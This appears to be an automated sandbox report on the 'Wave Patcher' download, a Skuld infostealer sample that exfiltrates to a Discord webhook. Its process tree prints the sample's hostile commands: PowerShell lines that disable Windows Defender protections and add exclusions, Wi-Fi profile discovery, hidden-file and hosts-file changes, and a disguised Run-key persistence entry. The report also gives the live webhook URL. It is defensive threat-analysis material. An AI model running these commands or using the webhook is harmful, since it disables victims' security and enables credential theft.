Analysis
max time kernel: 268s
max time network: 203s
platform: windows10-2004_x64
resource: win10v2004-20240709-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
submitted: 27/07/2024, 21:38
Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
Sample: https://www.mediafire.com/file/5m68x2gx8mpqc9k/Wave_Patcher.rar/file
Resource: win10v2004-20240709-en
General
-
Target
https://www.mediafire.com/file/5m68x2gx8mpqc9k/Wave_Patcher.rar/file
Malware Config
Extracted
skuld
https://discord.com/api/webhooks/1266866341571461145/w77pxgx17qK5NC3jPAoiGlU17x5HMUhUrIPtzVPCNb94ddb5gjD2NOd-1mDz4Ca_u0g7
Signatures
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
pid   Process
3860  powershell.exe
3776  powershell.exe
-
Drops file in Drivers directory 3 IoCs
description                   ioc                                    Process
File opened for modification  C:\Windows\System32\drivers\etc\hosts  attrib.exe
File opened for modification  C:\Windows\System32\drivers\etc\hosts  Wave Patcher.exe
File opened for modification  C:\Windows\System32\drivers\etc\hosts  attrib.exe
-
Executes dropped EXE 1 IoCs
pid   Process
4684  Wave Patcher.exe
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description  ioc  Process
Set value (str)  \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"  Wave Patcher.exe
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow  ioc
229   discord.com
230   discord.com
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow  ioc
217   api.ipify.org
218   api.ipify.org
220   ip-api.com
-
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description        ioc                                                              Process
Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum        Wave Patcher.exe
Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0      Wave Patcher.exe
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description           ioc                                         Process
Key value enumerated  \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh  netsh.exe
Key opened            \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh  netsh.exe
Key queried           \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh  netsh.exe
-
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid   Process
4860  netsh.exe
-
Detects videocard installed 1 TTPs 2 IoCs
Uses WMIC.exe to determine videocard installed.
pid   Process
3048  wmic.exe
216   wmic.exe
-
Enumerates system info in registry 2 TTPs 3 IoCs
description        ioc                                                                      Process
Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS                       msedge.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer    msedge.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName     msedge.exe
-
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description             flow  ioc
HTTP User-Agent header  221   Go-http-client/1.1
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid   Process
2740  msedge.exe
5008  msedge.exe
4628  msedge.exe
4684  Wave Patcher.exe
3776  powershell.exe
3860  powershell.exe
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
pid   Process
5008  msedge.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
description                           pid   Process
Token: SeRestorePrivilege             4672  7zG.exe
Token: 35                             4672  7zG.exe
Token: SeSecurityPrivilege            4672  7zG.exe
Token: SeDebugPrivilege               4684  Wave Patcher.exe
Token: SeIncreaseQuotaPrivilege       3060  wmic.exe
Token: SeSecurityPrivilege            3060  wmic.exe
Token: SeTakeOwnershipPrivilege       3060  wmic.exe
Token: SeLoadDriverPrivilege          3060  wmic.exe
Token: SeSystemProfilePrivilege       3060  wmic.exe
Token: SeSystemtimePrivilege          3060  wmic.exe
Token: SeProfSingleProcessPrivilege   3060  wmic.exe
Token: SeIncBasePriorityPrivilege     3060  wmic.exe
Token: SeCreatePagefilePrivilege      3060  wmic.exe
Token: SeBackupPrivilege              3060  wmic.exe
Token: SeRestorePrivilege             3060  wmic.exe
Token: SeShutdownPrivilege            3060  wmic.exe
Token: SeDebugPrivilege               3060  wmic.exe
Token: SeSystemEnvironmentPrivilege   3060  wmic.exe
Token: SeRemoteShutdownPrivilege      3060  wmic.exe
Token: SeUndockPrivilege              3060  wmic.exe
Token: SeManageVolumePrivilege        3060  wmic.exe
Token: 33                             3060  wmic.exe
Token: 34                             3060  wmic.exe
Token: 35                             3060  wmic.exe
Token: 36                             3060  wmic.exe
Token: SeIncreaseQuotaPrivilege       3048  wmic.exe
Token: SeSecurityPrivilege            3048  wmic.exe
Token: SeTakeOwnershipPrivilege       3048  wmic.exe
Token: SeLoadDriverPrivilege          3048  wmic.exe
Token: SeSystemProfilePrivilege       3048  wmic.exe
Token: SeSystemtimePrivilege          3048  wmic.exe
Token: SeProfSingleProcessPrivilege   3048  wmic.exe
Token: SeIncBasePriorityPrivilege     3048  wmic.exe
Token: SeCreatePagefilePrivilege      3048  wmic.exe
Token: SeBackupPrivilege              3048  wmic.exe
Token: SeRestorePrivilege             3048  wmic.exe
Token: SeShutdownPrivilege            3048  wmic.exe
Token: SeDebugPrivilege               3048  wmic.exe
Token: SeSystemEnvironmentPrivilege   3048  wmic.exe
Token: SeRemoteShutdownPrivilege      3048  wmic.exe
Token: SeUndockPrivilege              3048  wmic.exe
Token: SeManageVolumePrivilege        3048  wmic.exe
-
Suspicious use of FindShellTrayWindow 48 IoCs
pid   Process
5008  msedge.exe
4672  7zG.exe
-
Suspicious use of SendNotifyMessage 24 IoCs
pid   Process
5008  msedge.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
description                       pid   Process     procid_target
PID 5008 wrote to memory of 2484  5008  msedge.exe  85
PID 5008 wrote to memory of 4440  5008  msedge.exe  86
PID 5008 wrote to memory of 2740  5008  msedge.exe  87
PID 5008 wrote to memory of 4888  5008  msedge.exe  88
-
Views/modifies file attributes 1 TTPs 4 IoCs
pid   Process
2088  attrib.exe
4828  attrib.exe
1060  attrib.exe
2204  attrib.exe
Processes
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.mediafire.com/file/5m68x2gx8mpqc9k/Wave_Patcher.rar/file
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:5008
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffce1a846f8,0x7ffce1a84708,0x7ffce1a84718
      PID:2484
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,2302897963856200515,3343385406344153578,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2
      PID:4440
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,2302897963856200515,3343385406344153578,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:3
      - Suspicious behavior: EnumeratesProcesses
      PID:2740
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,2302897963856200515,3343385406344153578,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2864 /prefetch:8
      PID:4888
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,2302897963856200515,3343385406344153578,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
      PID:2460
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,2302897963856200515,3343385406344153578,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
      PID:228
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2144,2302897963856200515,3343385406344153578,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5276 /prefetch:8
      PID:4640
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,2302897963856200515,3343385406344153578,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:1
      PID:4208
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,2302897963856200515,3343385406344153578,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4696 /prefetch:1
      PID:2988
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,2302897963856200515,3343385406344153578,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3676 /prefetch:1
      PID:4748
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,2302897963856200515,3343385406344153578,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:1
      PID:4280
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2144,2302897963856200515,3343385406344153578,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6224 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
      PID:4628
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,2302897963856200515,3343385406344153578,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5064 /prefetch:1
      PID:2464
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,2302897963856200515,3343385406344153578,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3508 /prefetch:1
      PID:1060
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=2144,2302897963856200515,3343385406344153578,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=3512 /prefetch:8
      PID:2616
- C:\Windows\System32\CompPkgSrv.exe
  C:\Windows\System32\CompPkgSrv.exe -Embedding
  PID:3340
- C:\Windows\System32\CompPkgSrv.exe
  C:\Windows\System32\CompPkgSrv.exe -Embedding
  PID:4356
- C:\Windows\System32\rundll32.exe
  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
  PID:4140
- C:\Windows\servicing\TrustedInstaller.exe
  C:\Windows\servicing\TrustedInstaller.exe
  PID:4208
- C:\Program Files\7-Zip\7zG.exe
  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Wave Patcher\" -spe -an -ai#7zMap11890:86:7zEvent22385
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:4672
- C:\Users\Admin\Downloads\Wave Patcher\Wave Patcher.exe
  "C:\Users\Admin\Downloads\Wave Patcher\Wave Patcher.exe"
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Adds Run key to start application
  - Maps connected drives based on registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4684
    - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\Downloads\Wave Patcher\Wave Patcher.exe"
      - Views/modifies file attributes
      PID:2088
    - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      - Suspicious use of AdjustPrivilegeToken
      PID:3060
    - C:\Windows\system32\attrib.exe
      attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
      - Views/modifies file attributes
      PID:4828
    - C:\Windows\System32\Wbem\wmic.exe
      wmic path win32_VideoController get name
      - Detects videocard installed
      - Suspicious use of AdjustPrivilegeToken
      PID:3048
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads\Wave Patcher\Wave Patcher.exe"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      PID:3776
    - C:\Windows\System32\Wbem\wmic.exe
      wmic os get Caption
      PID:1692
    - C:\Windows\System32\Wbem\wmic.exe
      wmic cpu get Name
      PID:4968
    - C:\Windows\System32\Wbem\wmic.exe
      wmic path win32_VideoController get name
      - Detects videocard installed
      PID:216
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      PID:3860
    - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      PID:4240
    - C:\Windows\system32\netsh.exe
      netsh wlan show profiles
      - Event Triggered Execution: Netsh Helper DLL
      - System Network Configuration Discovery: Wi-Fi Discovery
      PID:4860
    - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      - Drops file in Drivers directory
      - Views/modifies file attributes
      PID:1060
    - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      - Drops file in Drivers directory
      - Views/modifies file attributes
      PID:2204
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
      PID:3536
        - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gosw5ca4\gosw5ca4.cmdline"
          PID:4504
            - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3629.tmp" "c:\Users\Admin\AppData\Local\Temp\gosw5ca4\CSC8EFDAFC34395444BA98E25CAD7262DF9.TMP"
              PID:1988
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Event Triggered Execution (1)
  - Netsh Helper DLL (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Event Triggered Execution (1)
  - Netsh Helper DLL (1)
Defense Evasion
- Hide Artifacts (1)
  - Hidden Files and Directories (1)
- Modify Registry (1)
- Obfuscated Files or Information (1)
  - Command Obfuscation (1)
Credential Access
- Credentials from Password Stores (1)
  - Credentials from Web Browsers (1)
- Unsecured Credentials (4)
  - Credentials In Files (4)
Downloads